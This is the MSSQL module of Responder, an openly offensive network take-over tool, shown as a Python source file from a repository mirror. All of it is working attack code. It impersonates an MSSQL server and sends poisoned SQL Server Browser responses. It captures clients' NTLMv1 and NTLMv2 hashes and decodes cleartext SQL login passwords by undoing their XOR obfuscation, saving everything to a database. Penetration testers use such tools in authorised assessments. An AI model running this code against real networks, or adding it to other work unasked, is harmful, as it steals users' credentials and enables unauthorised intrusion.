mirror of
https://github.com/lgandx/Responder.git
synced 2024-09-16 13:00:26 -07:00
20cdd9c7c2
fixes #251
187 lines
7.4 KiB
Python
187 lines
7.4 KiB
Python
#!/usr/bin/env python
|
|
# This file is part of Responder, a network take-over set of tools
|
|
# created and maintained by Laurent Gaffie.
|
|
# email: laurent.gaffie@gmail.com
|
|
# This program is free software: you can redistribute it and/or modify
|
|
# it under the terms of the GNU General Public License as published by
|
|
# the Free Software Foundation, either version 3 of the License, or
|
|
# (at your option) any later version.
|
|
#
|
|
# This program is distributed in the hope that it will be useful,
|
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
# GNU General Public License for more details.
|
|
#
|
|
# You should have received a copy of the GNU General Public License
|
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
import random
|
|
import struct
|
|
import codecs
|
|
from utils import *
|
|
if settings.Config.PY2OR3 == "PY3":
|
|
from socketserver import BaseRequestHandler
|
|
else:
|
|
from SocketServer import BaseRequestHandler
|
|
from packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer
|
|
|
|
|
|
class TDS_Login_Packet:
|
|
def __init__(self, data):
|
|
|
|
ClientNameOff = struct.unpack('<h', data[44:46])[0]
|
|
ClientNameLen = struct.unpack('<h', data[46:48])[0]
|
|
UserNameOff = struct.unpack('<h', data[48:50])[0]
|
|
UserNameLen = struct.unpack('<h', data[50:52])[0]
|
|
PasswordOff = struct.unpack('<h', data[52:54])[0]
|
|
PasswordLen = struct.unpack('<h', data[54:56])[0]
|
|
AppNameOff = struct.unpack('<h', data[56:58])[0]
|
|
AppNameLen = struct.unpack('<h', data[58:60])[0]
|
|
ServerNameOff = struct.unpack('<h', data[60:62])[0]
|
|
ServerNameLen = struct.unpack('<h', data[62:64])[0]
|
|
Unknown1Off = struct.unpack('<h', data[64:66])[0]
|
|
Unknown1Len = struct.unpack('<h', data[66:68])[0]
|
|
LibraryNameOff = struct.unpack('<h', data[68:70])[0]
|
|
LibraryNameLen = struct.unpack('<h', data[70:72])[0]
|
|
LocaleOff = struct.unpack('<h', data[72:74])[0]
|
|
LocaleLen = struct.unpack('<h', data[74:76])[0]
|
|
DatabaseNameOff = struct.unpack('<h', data[76:78])[0]
|
|
DatabaseNameLen = struct.unpack('<h', data[78:80])[0]
|
|
data = NetworkRecvBufferPython2or3(data)
|
|
self.ClientName = data[8+ClientNameOff:8+ClientNameOff+ClientNameLen*2].replace('\x00', '')
|
|
self.UserName = data[8+UserNameOff:8+UserNameOff+UserNameLen*2].replace('\x00', '')
|
|
self.Password = data[8+PasswordOff:8+PasswordOff+PasswordLen*2].replace('\x00', '')
|
|
self.AppName = data[8+AppNameOff:8+AppNameOff+AppNameLen*2].replace('\x00', '')
|
|
self.ServerName = data[8+ServerNameOff:8+ServerNameOff+ServerNameLen*2].replace('\x00', '')
|
|
self.Unknown1 = data[8+Unknown1Off:8+Unknown1Off+Unknown1Len*2].replace('\x00', '')
|
|
self.LibraryName = data[8+LibraryNameOff:8+LibraryNameOff+LibraryNameLen*2].replace('\x00', '')
|
|
self.Locale = data[8+LocaleOff:8+LocaleOff+LocaleLen*2].replace('\x00', '')
|
|
self.DatabaseName = data[8+DatabaseNameOff:8+DatabaseNameOff+DatabaseNameLen*2].replace('\x00', '')
|
|
|
|
def ParseSQLHash(data, client, Challenge):
|
|
SSPIStart = data[8:]
|
|
LMhashLen = struct.unpack('<H',data[20:22])[0]
|
|
LMhashOffset = struct.unpack('<H',data[24:26])[0]
|
|
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen]
|
|
LMHash = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
|
|
NthashLen = struct.unpack('<H',data[30:32])[0]
|
|
NthashOffset = struct.unpack('<H',data[32:34])[0]
|
|
NTHash = SSPIStart[NthashOffset:NthashOffset+NthashLen]
|
|
NTHash = codecs.encode(NTHash, 'hex').upper().decode('latin-1')
|
|
DomainLen = struct.unpack('<H',data[36:38])[0]
|
|
DomainOffset = struct.unpack('<H',data[40:42])[0]
|
|
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
|
|
|
|
UserLen = struct.unpack('<H',data[44:46])[0]
|
|
UserOffset = struct.unpack('<H',data[48:50])[0]
|
|
User = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
|
|
|
|
if NthashLen == 24:
|
|
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, LMHash, NTHash, codecs.encode(Challenge,'hex').decode('latin-1'))
|
|
|
|
SaveToDb({
|
|
'module': 'MSSQL',
|
|
'type': 'NTLMv1',
|
|
'client': client,
|
|
'user': Domain+'\\'+User,
|
|
'hash': LMHash+":"+NTHash,
|
|
'fullhash': WriteHash,
|
|
})
|
|
|
|
if NthashLen > 60:
|
|
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), NTHash[:32], NTHash[32:])
|
|
|
|
SaveToDb({
|
|
'module': 'MSSQL',
|
|
'type': 'NTLMv2',
|
|
'client': client,
|
|
'user': Domain+'\\'+User,
|
|
'hash': NTHash[:32]+":"+NTHash[32:],
|
|
'fullhash': WriteHash,
|
|
})
|
|
|
|
|
|
def ParseSqlClearTxtPwd(Pwd):
|
|
Pwd = map(ord,Pwd.replace('\xa5',''))
|
|
Pw = b''
|
|
for x in Pwd:
|
|
Pw += codecs.decode(hex(x ^ 0xa5)[::-1][:2].replace("x", "0"), 'hex')
|
|
return Pw.decode('latin-1')
|
|
|
|
|
|
def ParseClearTextSQLPass(data, client):
|
|
TDS = TDS_Login_Packet(data)
|
|
SaveToDb({
|
|
'module': 'MSSQL',
|
|
'type': 'Cleartext',
|
|
'client': client,
|
|
'hostname': "%s (%s)" % (TDS.ServerName, TDS.DatabaseName),
|
|
'user': TDS.UserName,
|
|
'cleartext': ParseSqlClearTxtPwd(TDS.Password),
|
|
'fullhash': TDS.UserName +':'+ ParseSqlClearTxtPwd(TDS.Password),
|
|
})
|
|
|
|
# MSSQL Server class
|
|
class MSSQL(BaseRequestHandler):
|
|
def handle(self):
|
|
|
|
try:
|
|
self.ntry = 0
|
|
while True:
|
|
data = self.request.recv(1024)
|
|
self.request.settimeout(1)
|
|
Challenge = RandomChallenge()
|
|
|
|
if not data:
|
|
break
|
|
if settings.Config.Verbose:
|
|
print(text("[MSSQL] Received connection from %s" % self.client_address[0].replace("::ffff:","")))
|
|
if data[0] == b"\x12" or data[0] == 18: # Pre-Login Message
|
|
Buffer = str(MSSQLPreLoginAnswer())
|
|
self.request.send(NetworkSendBufferPython2or3(Buffer))
|
|
data = self.request.recv(1024)
|
|
|
|
if data[0] == b"\x10" or data[0] == 16: # NegoSSP
|
|
if re.search(b'NTLMSSP',data):
|
|
Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
|
|
Packet.calculate()
|
|
Buffer = str(Packet)
|
|
self.request.send(NetworkSendBufferPython2or3(Buffer))
|
|
data = self.request.recv(1024)
|
|
else:
|
|
ParseClearTextSQLPass(data,self.client_address[0])
|
|
|
|
if data[0] == b'\x11' or data[0] == 17: # NegoSSP Auth
|
|
ParseSQLHash(data,self.client_address[0],Challenge)
|
|
|
|
except:
|
|
pass
|
|
|
|
# MSSQL Server Browser class
|
|
# See "[MC-SQLR]: SQL Server Resolution Protocol": https://msdn.microsoft.com/en-us/library/cc219703.aspx
|
|
class MSSQLBrowser(BaseRequestHandler):
|
|
def handle(self):
|
|
if settings.Config.Verbose:
|
|
print(text("[MSSQL-BROWSER] Received request from %s" % self.client_address[0]))
|
|
|
|
data, soc = self.request
|
|
|
|
if data:
|
|
if data[0] in b'\x02\x03': # CLNT_BCAST_EX / CLNT_UCAST_EX
|
|
self.send_response(soc, "MSSQLSERVER")
|
|
elif data[0:1] == b'\x04': # CLNT_UCAST_INST
|
|
self.send_response(soc, data[1:].rstrip(b"\x00"))
|
|
elif data[0:1] == b'\x0F': # CLNT_UCAST_DAC
|
|
self.send_dac_response(soc)
|
|
|
|
def send_response(self, soc, inst):
|
|
print(text("[MSSQL-BROWSER] Sending poisoned response to %s" % self.client_address[0]))
|
|
|
|
server_name = ''.join(chr(random.randint(ord('A'), ord('Z'))) for _ in range(random.randint(12, 20)))
|
|
resp = "ServerName;%s;InstanceName;%s;IsClustered;No;Version;12.00.4100.00;tcp;1433;;" % (server_name, inst)
|
|
soc.sendto(struct.pack("<BH", 0x05, len(resp)) + NetworkSendBufferPython2or3(resp), self.client_address)
|
|
|
|
def send_dac_response(self, soc):
|
|
print(text("[MSSQL-BROWSER] Sending poisoned DAC response to %s" % self.client_address[0]))
|
|
|
|
soc.sendto(NetworkSendBufferPython2or3(struct.pack("<BHBH", 0x05, 0x06, 0x01, 1433)), self.client_address)
|